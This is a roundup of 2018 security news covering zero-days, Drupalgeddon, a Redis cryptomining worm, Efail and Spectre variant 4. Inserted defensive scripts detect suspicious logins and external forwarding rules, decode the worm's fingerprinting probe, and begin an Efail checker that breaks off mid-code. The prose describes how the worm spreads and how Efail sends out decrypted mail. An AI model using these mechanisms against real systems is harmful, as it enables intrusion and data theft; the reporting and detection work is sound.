During the first half of 2018, we have witnessed some particularly interesting zero-day exploits, including one for Flash (CVE-2018-4878) and more recently for Internet Explorer (CVE-2018-8174). The former was quickly used by exploit kits such as Magnitude, while it is only a matter of time before we see the latter being weaponized more widely.
We can now add to that list an Adobe Reader zero-day (CVE-2018-4990), which was reported by ESET and Microsoft and has already been patched. Although it has not been observed in the wild yet, it remains a dangerous threat considering it is coupled with a privilege escalation vulnerability in Microsoft Windows.
Mozilla’s Firefox browser allows users to take screenshots of entire pages or sections of pages and save them to the cloud, and these could end up accessible to everyone, an ethical hacker has discovered.
Introduced in the browser last fall, Firefox Screenshots was meant to make it easy for users to “take, download, collect and share screenshots.” To access it, one would have to click on the Page actions menu in the address bar (or simply right-click on a web page) and select Take a Screenshot.
A 37-year-old Latvian resident was convicted by a U.S. jury on Wednesday for his role in the operation of a counter antivirus service named Scan4You. Sentencing is scheduled for September 21.
Bondars and Martisevs were accused of running the Scan4You service, which helped cybercriminals test their malware to ensure that it would not be detected by cybersecurity products.
Bondars was convicted on Wednesday on one count of conspiracy to violate the Computer Fraud and Abuse Act (CFAA), one count of conspiracy to commit wire fraud, and one count of computer intrusion with intent to cause damage and aiding and abetting.
Taiwan-based industrial automation company Advantech has released an update for its WebAccess product to address nearly a dozen vulnerabilities, including critical flaws that allow arbitrary code execution.
Advantech WebAccess is a browser-based software package for human-machine interfaces (HMI) and supervisory control and data acquisition (SCADA) systems. The product is used in the United States, Europe and East Asia in the energy, critical manufacturing, and water and wastewater sectors.
A critical vulnerability in the DHCP client in Red Hat Enterprise Linux could allow an attacker to execute arbitrary commands on impacted systems.
Tracked as CVE-2018-1111, the security flaw was reported by Felix Wilhelm from Google’s Security Team. The bug was discovered in the NetworkManager integration script included in the DHCP client packages.
The vulnerability features a CVSS3 Base Score of 7.5 and can be exploited without special privileges. However, an attacker targeting the bug could execute arbitrary commands with root privileges on vulnerable Red Hat systems.
The DHCP client package in Red Hat includes a script for the NetworkManager component. The script is executed each time NetworkManager receives a DHCP response from a DHCP server. Thus, a malicious DHCP response could be used to cause the script to execute arbitrary shell commands.
“A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol,” Red Hat explains.
The British cyber-security expert credited with thwarting a major ransomware attack is attempting to prevent a phone call transcript being used against him in the US courts.
The document quotes Marcus Hutchins as saying that he wrote code for an unidentified third-party, who then used it to make bank-hacking software.
Mr Hutchins has been accused of creating and distributing the password-stealing malware Kronos.
He has denied the charges.
The Ilfracombe, Devon-based researcher rose to prominence a year ago when he halted the WannaCry ransomware attack.
“So, I wrote code for a guy a while back who then incorporated it into a banking malware,” Mr Hutchins is quoted as saying during the phone call after his arrest.
Zack Whittaker / ZDNet:
A bug in the website of LocationSmart, which sells real-time phone location data, let anyone track people’s locations across North America without consent.
The bug allowed one Carnegie Mellon researcher to track anyone’s cell phone in real time.
A company that collects the real-time location data on millions of cell phone customers across North America had a bug in its website that allowed anyone to see where a person is located — without obtaining their consent.
Earlier this week, we reported that four of the largest cell giants in the US are selling your real-time location data to a company that you’ve probably never heard about before.
The company, LocationSmart, is a data aggregator and claims to have “direct connections” to cell carriers to obtain locations from nearby cell towers. The site had its own “try-before-you-buy” page that let you test the accuracy of its data. The page required explicit consent from the user before their location data could be used, by sending a one-time text message to the user. When we tried with a colleague, we tracked his phone to a city block of his actual location.
But that website had a bug that allowed anyone to track someone’s location silently without their permission.
The company embroiled in a privacy row has “direct connections” to all major US wireless carriers, including AT&T, Verizon, T-Mobile, and Sprint — and Canadian cell networks, too.
A quarter of Asia-Pacific companies have experienced a security incident, while 27 percent aren’t even sure because they haven’t conducted any data breach assessment, even as the region is estimated to have lost US$1.75 trillion last year due to cyberattacks.
Lily Hay Newman / Wired:
Operator of malware-testing service Scan4You, which helped hackers evade antivirus software, convicted by US jury after Trend Micro gave data to the FBI — Most antivirus scanners play a classic cat and mouse game: They work by checking software against a frequently updated list of potential threats. https://www.wired.com/story/inside-scan4you-takedown
Music Business Worldwide:
After reports that Tidal is inflating streaming numbers for big stars and is late paying royalties, company hires cybersecurity firm to investigate breach
Under-fire streaming platform TIDAL has announced that it has enlisted an “independent, third party cyber-security firm” to investigate a potential data breach at the company.
Its reason for doing so, however, is slightly confusing: the platform strongly denies claims recently made by Norwegian financial newspaper Dagens Næringsliv, which suggest that the accounts of TIDAL subscribers were manipulated in 2016 to falsely bulk up streaming numbers allocated to Kanye West’s The Life Of Pablo and Beyoncé’s Lemonade.
Cyrus Farivar / Ars Technica:
Alleged owners of Mugshots.com, a site that publishes mugshots and demands payment for removal, arrested on extortion, money laundering, identity theft charges
Dan Goodin / Ars Technica:
McAfee report: North Korea-linked hackers posted three apps on Google Play to steal personal info from defectors; hackers made contact with targets via Facebook
Researchers said a team of hackers tied to North Korea recently managed to get the Google Play market to host at least three Android apps designed to surreptitiously steal personal information from defectors of the isolated nation.
The three apps first appeared in the official Android marketplace in January and weren’t removed until March when Google was privately notified. That’s according to a blog post published Thursday by researchers from security company McAfee. Two apps masqueraded as security apps, and a third purported to provide information about food ingredients. Hidden functions caused them to steal device information and allow them to receive additional executable code that stole personal photos, contact lists, and text messages.
The apps were spread to selected individuals, in many cases by contacting them over Facebook. The apps had about 100 downloads when Google removed them.
Patrick Winn / GlobalPost Investigations:
Interviews with experts and defectors detail North Korea’s Reconnaissance General Bureau, whose hackers are estimated to have stolen $650M+
The Reconnaissance General Bureau, North Korea’s equivalent to the CIA, has trained up the world’s greatest bank-robbing crews. In just the past few years, RGB hackers have struck more than 100 banks and cryptocurrency exchanges around the world, pilfering more than $650 million. That we know of.
Chance Miller / 9to5Mac:
Apple is telling developers to remove CallKit from apps listed in App Store in China after government request, likely because of CallKit’s VoIP functionalities
Apple has started cracking down on yet another type of application in China. Following the earlier removal of VPN apps, the company is now removing applications that use the CallKit framework. The move comes in response to newly enforced regulation from the Chinese Ministry of Industry and Information Technology, according to a message obtained by 9to5Mac…
T-Mobile is investigating a retail store employee who allegedly made unauthorized changes to a subscriber’s account in an elaborate scheme to steal the customer’s three-letter Instagram username. The modifications, which could have let the rogue employee empty bank accounts associated with the targeted T-Mobile subscriber, were made even though the victim customer already had taken steps recommended by the mobile carrier to help minimize the risks of account takeover. Here’s what happened, and some tips on how you can protect yourself from a similar fate.
Earlier this month, KrebsOnSecurity heard from Paul Rosenzweig, a 27-year-old T-Mobile customer from Boston who had his wireless account briefly hijacked.
So-called “port out” scams allow crooks to intercept your calls and messages while your phone goes dark. Porting a number to a new provider shuts off the phone of the original user, and forwards all calls to the new device. Once in control of the mobile number, thieves who have already stolen a target’s password(s) can request any second factor that is sent to the newly activated device, such as a one-time code sent via text message or an automated call that reads the one-time code aloud.
A SIM swap is a legitimate process by which a customer can request that a new SIM card (the tiny, removable chip in a mobile device that allows it to connect to the provider’s network) be added to the account. Customers can request a SIM swap when their existing SIM card has been damaged, or when they are switching to a different phone that requires a SIM card of another size.
However, thieves and other ne’er-do-wells can abuse this process by posing as a targeted mobile customer or technician and tricking employees at the mobile provider into swapping in a new SIM card for that customer on a device that they control. If successful, the SIM swap accomplishes more or less the same result as a number port out (at least in the short term) — effectively giving the attackers access to any text messages or phone calls that are sent to the target’s mobile account.
Google is putting yet another nail in the HTTP coffin: starting with Chrome 70, pages that are not served over a secure connection will be marked with a red warning.
The search giant has been pushing for an encrypted web for many years, and suggested in 2014 that all HTTP sites be marked as insecure.
Google proposed that Chrome would initially mark HTTP pages serving password fields or credit card interactions as “Not Secure,” and only then move to marking all of them in a similar manner.
Now, Google believes that the Chrome security indicators should evolve in line with a wider adoption of HTTPS across the Internet.
At the beginning of May 2018, over 93% of the traffic across Google resources was being served over an encrypted connection, a major improvement since early 2014, when only 50% of the traffic was encrypted.
“Previously, HTTP usage was too high to mark all HTTP pages with a strong red warning, but in October 2018 (Chrome 70), we’ll start showing the red “not secure” warning when users enter data on HTTP pages,” Emily Schechter, Product Manager, Chrome Security, notes in a blog post.
The Drupal websites hacked by cybercriminals using the vulnerabilities known as Drupalgeddon2 and Drupalgeddon3 deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.
Two highly critical flaws were patched in recent months in the Drupal content management system (CMS). The security holes are tracked as CVE-2018-7600 and CVE-2018-7602, and they both allow remote code execution.
Malicious actors started exploiting CVE-2018-7600, dubbed Drupalgeddon2, roughly two weeks after a patch was released and shortly after a proof-of-concept (PoC) exploit was made public.
CVE-2018-7602, dubbed Drupalgeddon3, was discovered during an analysis of CVE-2018-7600 by the Drupal Security Team and developer Jasper Mattsson, who also reported the original vulnerability. Hackers started exploiting CVE-2018-7602 immediately after the release of a patch.
Updates announced on Friday by the Internet Systems Consortium (ISC) for BIND, the most widely used Domain Name System (DNS) software, patch a couple of vulnerabilities.
While attackers may be able to exploit both of the flaws remotely for denial-of-service (DoS) attacks, the security holes have been assigned only a “medium” severity rating.
One of the vulnerabilities, tracked as CVE-2018-5737, can allow a remote attacker to cause operational problems, including degradation of the service or a DoS condition.
The vulnerability impacts BIND 9.12.0 and 9.12.1 if the server is configured to allow recursion to clients and the max-stale-ttl parameter has a value other than zero. The issue has been patched in BIND 9.12.1-P2, but workarounds are also available.
A New Mexico man has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.
John Kelsey Gammell, 55, used several so-called booter services to launch cyberattacks, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser. His targets included former employers, business competitors, companies that refused to hire him, colleges, law enforcement agencies, courts, banks, and telecoms firms.
The U.S. Justice Department on Thursday announced more charges against two Syrian nationals believed to be members of the “Syrian Electronic Army” hacker group.
Ahmad ‘Umar Agha, 24, known online as “The Pro,” and Firas Dardar, 29, known online as “The Shadow,” have been indicted on 11 counts of conspiracy to commit computer fraud, conspiracy to commit wire fraud, and aggravated identity theft.
A new variant of the Mirai Internet of Things (IoT) botnet has emerged, which features new exploits in its arsenal and distributes a new bot, Fortinet researchers warn.
Called Wicked, based on strings found in the code, the malware has added three new exploits compared to Mirai and appears to be the work of the same developer behind other Mirai variants.
The Mirai botnet was first spotted in the third quarter of 2016, when it fueled some of the largest distributed denial of service (DDoS) attacks at the time. The malware’s source code was leaked online in October 2016, and numerous variants have been observed ever since: Masuta, Satori, Okiru, and others.
Similar to other botnets based on Mirai, the newly discovered Wicked iteration contains three main modules: Attack, Killer, and Scanner. Unlike Mirai, however, which used brute force to gain access to vulnerable IoT devices, Wicked uses known and available exploits, many of which are already old, the security researchers discovered.
Wicked would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to the target device. Upon establishing a connection, the malware attempts to exploit the device and upload a payload to it by writing the exploit strings to the socket.
Phishing takes place when a fraudster tricks an individual into sharing sensitive information (account numbers, Social Security numbers, login credentials, etc.) by way of fraudulent emails, texts, or counterfeit websites. Phishing can also enable a scammer to gain access to a computer or network so that they can install malware, such as ransomware, on a victim’s computer. Phishers are able to achieve this by spoofing the familiar, trusted logos of established, legitimate companies. Or, they may pose as a friend or family member and are often successful in completely deluding their targets.
Over the past 12 months we have seen a sharp increase in the number of incidents relating to the compromise of business email accounts. These are often O365 tenants, but also some Gmail and on-premise systems with webmail access.
The objective is simple: use the compromised mailbox to convince the organisation, or a customer of the organisation, to pay a fake invoice and transfer the money overseas. The average net of these breaches is around $85,000, but there have been cases well into the 7 figures. So quite worthwhile for the attacker. Most organisations are not set up to prevent or detect this kind of attack until it is too late.
Whilst similar to whaling emails, the approach is more thought out and structured. The attacks are typically targeted. There are two scenarios we usually see:
Compromise the victim company, identify invoices to be paid by the victim, spoof the company to be paid and convince the victim to pay to an incorrect account.
Compromise the victim company, identify customer invoices to be paid to the victim, spoof the victim and convince customers to pay invoices into an incorrect account.
There are a few opportunities to detect or prevent these kinds of attacks:
Prevent
Have a robust payment-change process – validate using details you already hold in your database and call the payee on those details, regardless of whether someone called you.
Don’t pay to overseas accounts – especially when previous invoices were paid within the country.
Check previous payments – Where did they go, is this different, if so halt the payment.
Disallow forwarding rules to external addresses – This won’t stop it, but does make it more difficult
Multi Factor Authentication (MFA) on mail
Detect
Logins from locations other than your office
Logins where the IP address changes – we see many attackers use open proxies when logging into a victim account. In the logs it looks as though the person travels rapidly across the globe.
Regularly interrogate rules created in the email product – this is often how we find the other compromised accounts.
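The two detections in the list above (impossible-travel logins and forwarding rules to external addresses), as an added example that is not part of the original post. It runs over constructed sign-in log lines and mailbox rules; the country coordinates, office country, internal domain and speed threshold are assumptions, not values from the post.

```python
"""Added example: two of the detections the post lists, run over constructed
sample data (not real tenant data).

1. Sign-in logs: flag a user whose consecutive sign-ins come from countries
   too far apart for the elapsed time (the 'travels rapidly across the globe'
   pattern that open proxies produce), plus sign-ins from outside the office
   country.
2. Mailbox rules: flag rules that forward or redirect mail to an external
   domain."""
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Constructed approximate coordinates for the countries in the sample log.
COUNTRY_COORDS = {
    "AU": (-33.87, 151.21),
    "US": (37.77, -122.42),
    "NG": (6.52, 3.38),
    "DE": (52.52, 13.40),
}
OFFICE_COUNTRY = "AU"            # assumed home country of the organisation
INTERNAL_DOMAIN = "example.com"  # assumed internal mail domain
MAX_PLAUSIBLE_KMH = 900          # assumed ceiling: faster than an airliner = impossible

# Constructed sign-in log: timestamp, user, source IP, country of that IP.
SIGNIN_LOG = """\
2018-05-14T08:02:11Z alice@example.com 203.0.113.7 AU
2018-05-14T08:40:53Z alice@example.com 198.51.100.23 US
2018-05-14T09:15:02Z alice@example.com 192.0.2.45 NG
2018-05-14T09:30:00Z bob@example.com 203.0.113.9 AU
2018-05-14T17:10:00Z bob@example.com 203.0.113.9 AU
"""


def haversine_km(a, b):
    """Great-circle distance in km between two (lat, lon) pairs in degrees."""
    lat1, lon1 = map(radians, a)
    lat2, lon2 = map(radians, b)
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371 * asin(sqrt(h))


def parse_signins(text):
    """Parse the whitespace-separated log into (time, user, ip, country) rows."""
    rows = []
    for line in text.splitlines():
        ts, user, ip, country = line.split()
        rows.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), user, ip, country))
    return rows


def detect_suspicious_signins(text):
    """Return a list of (user, reason) findings in log order."""
    findings = []
    last_seen = {}  # user -> (time, country) of the previous sign-in
    for ts, user, ip, country in parse_signins(text):
        if country != OFFICE_COUNTRY:
            findings.append((user, f"login from outside office country: {ip} ({country})"))
        if user in last_seen:
            prev_ts, prev_country = last_seen[user]
            if prev_country != country:
                hours = (ts - prev_ts).total_seconds() / 3600
                km = haversine_km(COUNTRY_COORDS[prev_country], COUNTRY_COORDS[country])
                # Two countries in zero time, or faster than any flight: flag it.
                if hours == 0 or km / hours > MAX_PLAUSIBLE_KMH:
                    findings.append((user, f"impossible travel {prev_country}->{country} "
                                           f"({km:.0f} km in {hours:.2f} h)"))
        last_seen[user] = (ts, country)
    return findings


# Constructed mailbox rules as (owner, rule name, action, target).
MAILBOX_RULES = [
    ("alice@example.com", "Archive invoices", "move", "Archive"),
    ("alice@example.com", "Backup copy", "forward", "acct.payable.backup@mail-example.net"),
    ("bob@example.com", "Team CC", "forward", "team@example.com"),
]


def detect_external_forwarding(rules):
    """Flag forward/redirect rules whose target is not an internal address."""
    hits = []
    for owner, name, action, target in rules:
        if action in ("forward", "redirect") and not target.lower().endswith("@" + INTERNAL_DOMAIN):
            hits.append((owner, name, target))
    return hits


if __name__ == "__main__":
    for user, reason in detect_suspicious_signins(SIGNIN_LOG):
        print(f"[signin] {user}: {reason}")
    for owner, name, target in detect_external_forwarding(MAILBOX_RULES):
        print(f"[rule] {owner}: rule {name!r} forwards to external address {target}")
```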
Publicly accessible Redis servers have been exploited for a while now, but we stumbled upon an interesting mining worm in one of our honeytraps. Within the past 5 days, we’ve seen 173 unique IP addresses that have been infected with this worm, of which 88% of the infected servers are located in China, 4% in the US and 4% in Hong Kong.
The worm searches for open Redis servers (port 6379), configures cron to download itself every few minutes (using a file upload service), starts mining and finally looks for new targets. It will send the payload “*1\r\n$4\r\nINFO\r\n” and check the response for the string “os:Linux”, to prevent replication to other operating systems.
When the cron job executes, the worm will disable security, close the existing publicly open Redis port using iptables, disable SELinux and disable caching. If there are miners running, they will be killed and the cryptonight miner starts. The worm is taking advantage of public file hosting, in this case transfer.sh, to replicate itself. Transfer.sh removes files after 14 days; that is presumably why a fresh copy is uploaded on each replication.
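How a honeypot or network sensor can recognise the fingerprinting probe quoted above, as an added example that is not part of the original post: a small parser for the RESP wire format (arrays and bulk strings) decodes “*1\r\n$4\r\nINFO\r\n” to the INFO command, and the worm’s own “os:Linux” gate is applied to a constructed INFO reply. The byte stream and the reply contents (including the version string) are constructed, not captured traffic.

```python
"""Added example: decode the RESP (Redis serialisation protocol) probe
"*1\r\n$4\r\nINFO\r\n" as a honeypot would, and apply the worm's
"os:Linux" replication gate to a constructed INFO reply."""


def parse_resp(data):
    """Parse one RESP value from bytes; return (value, remaining_bytes).
    Handles arrays ('*'), bulk strings ('$') and simple strings ('+')."""
    if not data:
        raise ValueError("empty buffer")
    kind = data[0:1]
    line_end = data.index(b"\r\n")
    header = data[1:line_end]
    rest = data[line_end + 2:]
    if kind == b"+":                      # +OK\r\n
        return header.decode(), rest
    if kind == b"$":                      # $4\r\nINFO\r\n
        length = int(header)
        if length == -1:                  # null bulk string
            return None, rest
        if len(rest) < length + 2 or rest[length:length + 2] != b"\r\n":
            raise ValueError("truncated bulk string")
        return rest[:length].decode(), rest[length + 2:]
    if kind == b"*":                      # *1\r\n<one element>
        count = int(header)
        items = []
        for _ in range(count):
            item, rest = parse_resp(rest)
            items.append(item)
        return items, rest
    raise ValueError(f"unsupported RESP type {kind!r}")


def parse_commands(stream):
    """Split a client byte stream into commands, each a list of strings."""
    commands = []
    while stream:
        value, stream = parse_resp(stream)
        commands.append(value)
    return commands


def is_info_probe(command):
    """A bare INFO with no arguments is the worm's OS-fingerprinting probe."""
    return isinstance(command, list) and len(command) == 1 and command[0].upper() == "INFO"


def find_fingerprint_probes(stream):
    """Return every command in the stream that matches the probe."""
    return [cmd for cmd in parse_commands(stream) if is_info_probe(cmd)]


def looks_like_linux(info_reply):
    """The worm's replication gate: proceed only if INFO reports os:Linux."""
    return any(line.startswith("os:Linux") for line in info_reply.splitlines())


# Constructed client stream: the probe from the post, then an unrelated PING.
CLIENT_STREAM = b"*1\r\n$4\r\nINFO\r\n*1\r\n$4\r\nPING\r\n"

# Constructed INFO reply; Redis returns it as one bulk string.
INFO_TEXT = "# Server\r\nredis_version:4.0.9\r\nos:Linux 4.4.0 x86_64\r\n"
INFO_REPLY_RESP = f"${len(INFO_TEXT)}\r\n{INFO_TEXT}\r\n".encode()

if __name__ == "__main__":
    for cmd in find_fingerprint_probes(CLIENT_STREAM):
        print("fingerprint probe seen:", cmd)
    reply, _ = parse_resp(INFO_REPLY_RESP)
    print("worm would replicate here:", looks_like_linux(reply))
```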
On Monday a team of researchers from Münster, RUB and NXP disclosed serious cryptographic vulnerabilities in a number of encrypted email clients. The flaws, which go by the cute vulnerability name of “Efail”, potentially allow an attacker to decrypt S/MIME or PGP-encrypted email with only minimal user interaction.
By the standards of cryptographic vulnerabilities, this is about as bad as things get. In short: if an attacker can intercept and alter an encrypted email — say, by sending you a new (altered) copy, or modifying a copy stored on your mail server — they can cause many GUI-based email clients to send the full plaintext of the email to an attacker-controlled server. Even worse, most of the basic problems that cause this flaw have been known for years, and yet remain in clients.
The big (and largely under-reported) story of EFail is the way it affects S/MIME. That “corporate” email protocol is simultaneously (1) hated by the general crypto community because it’s awful and has a slash in its name, and yet (2) is probably the most widely-used email encryption protocol in the corporate world.
Efail also happens to affect a smaller, but non-trivial number of OpenPGP-compatible clients.
How Efail was disclosed to the PGP community
Putting together a comprehensive timeline of the Efail disclosure process would probably be a boring, time-intensive project. Fortunately Thomas Ptacek loves boring and time-intensive projects, and has already done this for us.
Briefly, the first Efail disclosures to vendors began last October, more than 200 days prior to the agreed publication date. The authors notified a large number of vulnerable PGP GUI clients, and also notified the GnuPG project (on which many of these projects depend) by February at the latest. From what I can tell every major vendor agreed to make some kind of patch. GnuPG decided that it wasn’t their fault, and basically stopped corresponding.
All parties agreed not to publicly discuss the vulnerability until an agreed date in April, which was later pushed back to May 15. The researchers also notified the EFF and some journalists under embargo, but none of them leaked anything. On May 14 someone dumped the bug onto a mailing list. So the EFF posted a notice about the vulnerability (which we’ll discuss a bit more below), and the researchers put up a website. That’s pretty much the whole story.
There are three basic accusations going around about the Efail disclosure. They can be summarized as (1) maintaining embargoes in coordinated disclosures is really hard, (2) the EFF disclosure “unfairly” made this sound like a serious vulnerability “when it isn’t”, and (3) everything was already patched anyway so what’s the big deal.
A dataset allegedly containing 200 million unique sets of personally identifiable information (PII) exfiltrated from several popular Japanese website databases emerged on underground forums, FireEye reports.
Advertised by a Chinese threat actor at around $150, the dataset contained names, credentials, email addresses, dates of birth, phone numbers, and home addresses, and was initially spotted in December 2017.
The data appears sourced from a variety of Japanese websites, including those in the retail, food and beverage, financial, entertainment, and transportation sectors, and FireEye believes that the cybercriminals obtained it via opportunistic compromises.
A misconfigured server operated by CalAmp, a company offering the backend for a broad range of well-known car alarm systems, provided anyone with access to data and even allowed for account and vehicle takeover.
The issue was discovered by security researchers Vangelis Stykas and George Lavdanis, while looking for issues in the Viper SmartStart system, which allows users to remotely start, lock, unlock, or locate their vehicles directly from their smartphones.
The researchers discovered that the application uses an SSL connection and uses SSL pinning to prevent tampering.
The U.S. Department of Homeland Security (DHS) this week published its long-delayed Cybersecurity Strategy. It had been mandated by Congress to deliver a strategy by March 2017, and did so on May 15, 2018.
The strategy is defined in a high-level document (PDF) of 35 pages. Its scope is to provide “the Department with a framework to execute our cybersecurity responsibilities during the next five years to keep pace with the evolving cyber risk landscape by reducing vulnerabilities and building resilience; countering malicious actors in cyberspace; responding to incidents; and making the cyber ecosystem more secure and resilient.”
Zack Whittaker / ZDNet:
TeenSafe, an app for parents to monitor kids’ phone use, stored some app login passwords and kids’ Apple ID credentials in plaintext on an unsecured AWS server
Exclusive: A server stored teenagers’ Apple ID email addresses and plaintext passwords.
At least one server used by an app for parents to monitor their teenagers’ phone activity has leaked tens of thousands of accounts of both parents and children.
The mobile app, TeenSafe, bills itself as a “secure” monitoring app for iOS and Android, which lets parents view their child’s text messages and location, monitor who they’re calling and when, access their web browsing history, and find out which apps they have installed.
Although teen monitoring apps are controversial and privacy-invasive, the company says it doesn’t require parents to obtain the consent of their children.
Robert Wiggins, a UK-based security researcher who searches for public and exposed data, found two leaky servers.
Both of the servers were pulled offline after ZDNet alerted the company.
“We have taken action to close one of our servers to the public and begun alerting customers that could potentially be impacted,” a TeenSafe spokesperson told ZDNet on Sunday.
The database stores the parent’s email address associated with TeenSafe, as well as their corresponding child’s Apple ID email address. It also includes the child’s device name — which is often just their name — and their device’s unique identifier.
There were at least 10,200 records from the past three months containing customer data.
TeenSafe claims to have over a million parents using the service.
We contacted a dozen people over iMessage, one by one, to confirm their passwords.
It’s not clear why the data, let alone passwords for teens’ Apple IDs, was stored in plaintext.
The company claims on its website that it’s “secure” and uses encryption.
Just as hackers want verification for credibility or acclaim, some breach sites want news coverage to sell something. The hacked companies want to know so they can disaster-manage (companies get hacked because their security is bad, not because the hackers are always that good), and news outlets want the exclusive.
But also — verification is important for the victims. The sooner victims know about data breaches, the sooner they can protect themselves.
Make no mistake, verifying data isn’t an easy process. It’s time consuming, laborious, and not always fruitful.
Logging into someone else’s account without permission is illegal in the US.
Besides, that still wouldn’t be enough to verify a breach.
When reporters verify breaches, they walk a line to ensure they’re not intrusive or inconveniencing people. One of the easiest ways to begin verifying a breach is by enumerating disposable Mailinator email accounts through a website’s password reset field. Reporters also have to examine the data.
This boom in hack reporting has in part led to a cycle of more awareness and coverage, which has led to more data breach monitoring and notification sites popping up.
A fourth variant of the data-leaking Meltdown-Spectre security flaws in modern processors has been found by Microsoft and Google researchers.
These speculative-execution design blunders can be potentially exploited by malicious software running on a vulnerable device or computer.
Variants 1 and 2 are known as Spectre (CVE-2017-5753, CVE-2017-5715), and variant 3 is Meltdown (CVE-2017-5754). Today, variant 4 (CVE-2018-3639) was disclosed by Microsoft and Google researchers.
It affects modern out-of-order execution processor cores from Intel, AMD, and Arm, as well as IBM’s Power 8, Power 9, and System z CPUs. Bear in mind, Arm cores are used the world over in smartphones, tablets, and embedded electronics.
The fourth variant can be potentially exploited by script files running within a program – such as JavaScript on a webpage in a browser tab.
According to Intel, mitigations already released to the public for variant 1, which is the hardest vulnerability to tackle, should make attacks leveraging variant 4 much more difficult.
So far, no known exploit code is circulating in the wild targeting the fourth variant.
Another bug, CVE-2018-3640, was also disclosed: this is a rogue system register read, allowing normal programs to peek at hardware status flags and the like in registers that should only really be accessible by the operating system kernel, drivers, and hypervisors.
Variant 4 is referred to as a speculative store bypass. It is yet another “wait, why didn’t I think of that?” design oversight in modern out-of-order-execution engineering.
The name Spectre was chosen deliberately: it is like observing a ghost in the machine. Private data can be discerned by watching the cache being updated by the processor’s speculative execution engine. This speculation is crucial to running chips as fast as possible.
Intel, Arm, et al. response
“Variant 4 uses speculative execution, a feature common to most modern processor architectures, to potentially expose certain kinds of data through a side channel,” said Leslie Culbertson, Intel’s executive veep of product security.
“Starting in January, most leading browser providers deployed mitigations for Variant 1 in their managed runtimes – mitigations that substantially increase the difficulty of exploiting side channels in a web browser. These mitigations are also applicable to Variant 4 and available for consumers to use today.”
According to Culbertson, Intel and others will issue new microcode and software tweaks to more fully counter malware exploiting the fourth variant.
“We’ve already delivered the microcode update for Variant 4 in beta form to OEM system manufacturers and system software vendors, and we expect it will be released into production BIOS and software updates over the coming weeks.
“This mitigation will be set to off-by-default, providing customers the choice of whether to enable it or not. We expect most industry software partners will likewise use the default-off option.
“If enabled, we’ve observed a performance impact of approximately 2-8 per cent.”
Arm will make available to system-on-chip designers updated blueprints for Cortex-A72, Cortex-A73, and Cortex-A75 cores that are resistant to Spectre variant 2, and the Cortex-A75 will be updated to resist Meltdown, aka variant 3.
Red Hat today published a substantial guide to the fourth variant, its impact, and how it works. VMware also has an advisory and updates.
We note that, so far, no malware has been seen attacking any of the Spectre and Meltdown holes in today’s chips, let alone this latest variant.
Speculative Store Buffer Bypass is a security vulnerability that allows unauthorized users to steal sensitive information through websites. Similar to the Spectre and Meltdown threats in early 2018, it exploits speculative execution, a process most computers use to speed up routine tasks.
FireEye on Monday announced the availability of a platform that allows organizations and pentesters to check their ability to detect and respond to OAuth abuse attacks.
OAuth 2.0 is a protocol employed by major Internet companies, including Amazon, Google, Facebook, and Microsoft, to facilitate granting third-party applications access to user data. Using social engineering, attackers can trick victims into authorizing a third-party application to access their account, thus gaining access to all of the user’s data without the need for credentials.
“In releasing the tool, we hope to increase awareness about this threat, improve the security community’s ability to detect it, and provide countermeasures for defenders,” FireEye’s Doug Bienstock explains.
In an OAuth authorization flow, the third-party application requests a specific type of access to a user’s account, and APIs are used to define such sets of scopes (similar to the permissions apps ask for on mobile devices).
An attacker looking to abuse OAuth can create a malicious application and then retrieve user data with the help of obtained access tokens, via the API Resource. Access tokens don’t require a password and can bypass any two-factor enforcement in place, and access to the OAuth application has to be explicitly revoked to prevent abuse.
Germany’s federal cyber agency called on chip and hardware-makers to address new vulnerabilities discovered in computer central processing units, but said no complete fix was possible at the moment.
The BSI agency said its analysis showed the new flaws, dubbed Spectre-Next Generation, resembled the Meltdown and Spectre bugs discovered in January and could allow attackers to access personal data such as passwords and encryption keys.
While no new attacks were known outside laboratories, there was a risk that attackers could develop new methods based on detailed information that had been disclosed, it added.
Last week the PGPocalipse was all over the news… Except that, well, it wasn’t an apocalypse.
A team of researchers published a paper(PDF) where they describe how to decrypt a PGP encrypted email via a targeted attack. The research itself is pretty well documented and, from a security researcher perspective, it’s a good paper to read, especially the cryptography parts.
But we here at Hackaday were skeptical about media claims that Efail had broken PGP. Some media reports went as far as recommending everyone turn off PGP encryption on all email clients, but they weren’t able to back this recommendation up with firm reasoning. In fact, Efail isn’t an immediate threat for the vast majority of people simply because an attacker must already have access to an encrypted email to use the exploit. Advising everyone to disable encryption altogether just makes no sense.
Aside from the massive false alarm, Efail is a very interesting exploit.
Efail Does Not Directly Exploit PGP
In a nutshell, if an attacker is able to get access to a user’s encrypted email, they can modify the message in a specific way and send it back to the user. The user’s email client will then decrypt the message and (if the email client is rendering HTML tags) automatically send the decrypted message back to the attacker.
The encryption itself is not broken in any way. It’s how the messages are processed by the user’s email client that introduces the vulnerability. Saying PGP is broken is just plain wrong.
Efail Builds On the Concepts of Tracking Pixels
Efail uses this kind of remote loading of images as the backchannel to exfiltrate the decrypted email. Other methods should also be possible. Efail takes advantage of the fact that the email client first has to decrypt an encrypted message in order to show it, and only then renders the HTML code in the message.
Malleability Gadgets
We’ve seen how simple it is to implement a direct exfiltration channel in order to decrypt email. In some email clients, that technique does not work, so the Efail paper describes a more generic way to introduce the exfiltration channel inside the actually encrypted data itself.
Conclusion
My hope is that the reader realizes two things: that the encryption of emails is still generically safe, and that rendering HTML in emails is still not a good idea.
To protect yourself against this vulnerability, and a lot of others, disable HTML rendering in your email client. Many email clients allow for this and/or have settings to disable the loading of remote content.
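The direct-exfiltration shape described above (an HTML part that opens a tag such as `<img src="http://…` right before the encrypted part, so the decrypted plaintext is glued into the URL when the client renders HTML) can be spotted in the MIME structure before anything is decrypted. The following checker is an added example, not code from Hackaday or the Efail paper; the sample messages, addresses and host names in it are constructed placeholders.

```python
"""Detect the Efail "direct exfiltration" MIME shape without decrypting anything.

Added example: walks a message in document order and reports any text/html part
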